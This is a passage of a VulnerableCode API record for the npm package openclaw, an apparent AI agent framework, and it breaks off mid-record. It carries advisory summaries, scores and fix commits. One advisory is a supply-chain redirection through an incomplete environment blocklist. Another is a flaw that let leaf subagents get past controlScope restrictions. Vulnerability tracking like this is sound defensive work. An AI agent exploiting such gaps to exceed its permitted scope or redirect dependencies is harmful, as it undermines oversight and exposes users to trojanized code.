Look up vulnerable packages by Package URL (purl).

GET /api/packages/995437?format=api
HTTP 200 OK
Allow: GET, HEAD, OPTIONS
Content-Type: application/json
Vary: Accept

{
    "url": "http://public2.vulnerablecode.io/api/packages/995437?format=api",
    "purl": "pkg:npm/openclaw@2026.3.22-beta.1",
    "type": "npm",
    "namespace": "",
    "name": "openclaw",
    "version": "2026.3.22-beta.1",
    "qualifiers": {},
    "subpath": "",
    "is_vulnerable": true,
    "next_non_vulnerable_version": "2026.4.23",
    "latest_non_vulnerable_version": "2026.4.23",
    "affected_by_vulnerabilities": [
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91298?format=api",
            "vulnerability_id": "VCID-11dg-bvft-6kb1",
            "summary": "OpenClaw's incomplete host env sanitization blocklist allows supply-chain redirection via package-manager env overrides\n## Summary\n\nHost exec env override sanitization did not fail closed for several package-manager and related redirect variables that can steer dependency fetches or startup behavior.\n\n## Impact\n\nAn approved exec request could silently redirect package resolution or runtime bootstrap to attacker-controlled infrastructure and execute trojanized content.\n\n## Affected Component\n\n`src/infra/host-env-security-policy.json`, `src/infra/host-env-security.ts`\n\n## Fixed Versions\n\n- Affected: `< 2026.3.22`\n- Patched: `>= 2026.3.22`\n\n## Fix\n\nFixed by commit `7abfff756d` (`Exec: harden host env override handling across gateway and node`).",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41387",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00021",
                            "scoring_system": "epss",
                            "scoring_elements": "0.06029",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00021",
                            "scoring_system": "epss",
                            "scoring_elements": "0.06013",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00021",
                            "scoring_system": "epss",
                            "scoring_elements": "0.06015",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41387"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/7abfff756d6c68d17e21d1657bbacbaec86de232",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/7abfff756d6c68d17e21d1657bbacbaec86de232"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.22",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.22"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-j7p2-qcwm-94v4",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-30T12:50:39Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-j7p2-qcwm-94v4"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41387",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41387"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-supply-chain-redirection-via-incomplete-host-environment-sanitization",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-30T12:50:39Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-supply-chain-redirection-via-incomplete-host-environment-sanitization"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-j7p2-qcwm-94v4",
                    "reference_id": "GHSA-j7p2-qcwm-94v4",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-j7p2-qcwm-94v4"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.22",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p3b-pfnn-x7ad"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-1smq-mbty-jkaj"
                        },
                        {
                            "vulnerability": "VCID-24m7-jx1g-hqde"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-26sv-grsd-abcw"
                        },
                        {
                            "vulnerability": "VCID-294z-6z8j-97bx"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2hca-3v8f-f3e8"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2v8n-mnws-jfc9"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-32zs-2zs9-uufs"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-37ep-9smd-zuh9"
                        },
                        {
                            "vulnerability": "VCID-384t-z1h8-pfft"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3bdd-a9nw-13bn"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4jwj-6s5z-wbeq"
                        },
                        {
                            "vulnerability": "VCID-4nwq-14y4-xkhp"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4uqc-3h1c-4yhs"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5atj-2a7b-57g5"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6849-th74-yqd5"
                        },
                        {
                            "vulnerability": "VCID-6bxd-kbse-sudx"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-8uzb-xmf8-hbca"
                        },
                        {
                            "vulnerability": "VCID-8z7r-a8dv-eueb"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9jjv-aa8k-rke1"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9pj9-7b12-jbea"
                        },
                        {
                            "vulnerability": "VCID-9uyu-y9qv-u7e1"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-9yxw-fj1c-tff9"
                        },
                        {
                            "vulnerability": "VCID-a2p8-ydn6-3bbr"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-atn7-pn13-3fgb"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-aye6-1fwu-nkc5"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bg1d-gmxy-wkc6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bk76-1ctt-tkaw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-bnfh-rsk9-cfea"
                        },
                        {
                            "vulnerability": "VCID-brfj-4shr-qkgc"
                        },
                        {
                            "vulnerability": "VCID-bumq-54sb-6ua7"
                        },
                        {
                            "vulnerability": "VCID-bzw7-yvu2-yqa2"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-csnc-r6fv-j3en"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-cvxu-rdbu-abd2"
                        },
                        {
                            "vulnerability": "VCID-cwd3-ecym-sfaw"
                        },
                        {
                            "vulnerability": "VCID-d3qp-5wm9-aqfp"
                        },
                        {
                            "vulnerability": "VCID-d864-qy75-c3dx"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dbcw-brhj-k7hs"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-djqx-bwuu-4uc1"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-gvam-2net-8kc5"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hkqd-6khg-m3hj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-j92n-5217-9bhj"
                        },
                        {
                            "vulnerability": "VCID-j96c-kau3-7fag"
                        },
                        {
                            "vulnerability": "VCID-jbwa-scg3-efeq"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jhah-j2td-t3dp"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-jtxm-z4vv-cqg7"
                        },
                        {
                            "vulnerability": "VCID-k3up-1vdf-2uh9"
                        },
                        {
                            "vulnerability": "VCID-k52b-966p-ybbk"
                        },
                        {
                            "vulnerability": "VCID-k5da-7tht-w3bs"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mggy-bv5s-5uax"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nfva-pukn-uqch"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pa1f-qzsh-efa9"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pc9z-x5wk-8ue7"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-qjvc-etb4-qbfv"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-r9y1-z2ax-z3e2"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-te8f-snty-j7hh"
                        },
                        {
                            "vulnerability": "VCID-tf28-1z2z-5yfn"
                        },
                        {
                            "vulnerability": "VCID-tk9h-nqrz-uugp"
                        },
                        {
                            "vulnerability": "VCID-u1ru-vdfp-x3hu"
                        },
                        {
                            "vulnerability": "VCID-u6hw-ffpj-4yd9"
                        },
                        {
                            "vulnerability": "VCID-u9cw-crg5-1kbs"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v1bp-hw9a-yffz"
                        },
                        {
                            "vulnerability": "VCID-v91b-1nmx-ckcx"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vm8g-hrvu-quhm"
                        },
                        {
                            "vulnerability": "VCID-vqrj-z6tx-rff2"
                        },
                        {
                            "vulnerability": "VCID-vtqt-bgz7-yub6"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2rd-2j4p-gfgw"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wkye-je9r-1fba"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wut7-y72y-9ucb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xpr3-hg3h-z3bz"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zac2-wjyt-27af"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zf3q-78js-k7ce"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"
                }
            ],
            "aliases": [
                "CVE-2026-41387",
                "GHSA-j7p2-qcwm-94v4"
            ],
            "risk_score": 4.3,
            "exploitability": "0.5",
            "weighted_severity": "8.6",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-11dg-bvft-6kb1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91737?format=api",
            "vulnerability_id": "VCID-1728-wc17-dud6",
            "summary": "OpenClaw leaf subagents can bypass controlScope restrictions to send messages to child sessions\n## Summary\nLeaf subagents could still use the `send` action to message controlled child sessions even when their `controlScope` was narrower than `children`.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `7679eb375294941b02214c234aff3948796969d0`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- `src/auto-reply/reply/commands-subagents/action-send.ts` now threads controller context through the send path.\n- `src/agents/subagent-control.ts` now blocks send attempts unless the requester owns the target and has `controlScope=\"children\"`.\n\nOpenClaw thanks @space08 for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35662",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00036",
                            "scoring_system": "epss",
                            "scoring_elements": "0.111",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00036",
                            "scoring_system": "epss",
                            "scoring_elements": "0.11059",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00036",
                            "scoring_system": "epss",
                            "scoring_elements": "0.11093",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35662"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T18:24:11Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/7679eb375294941b02214c234aff3948796969d0",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T18:24:11Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/7679eb375294941b02214c234aff3948796969d0"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-x2cm-hg9c-mf5w",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
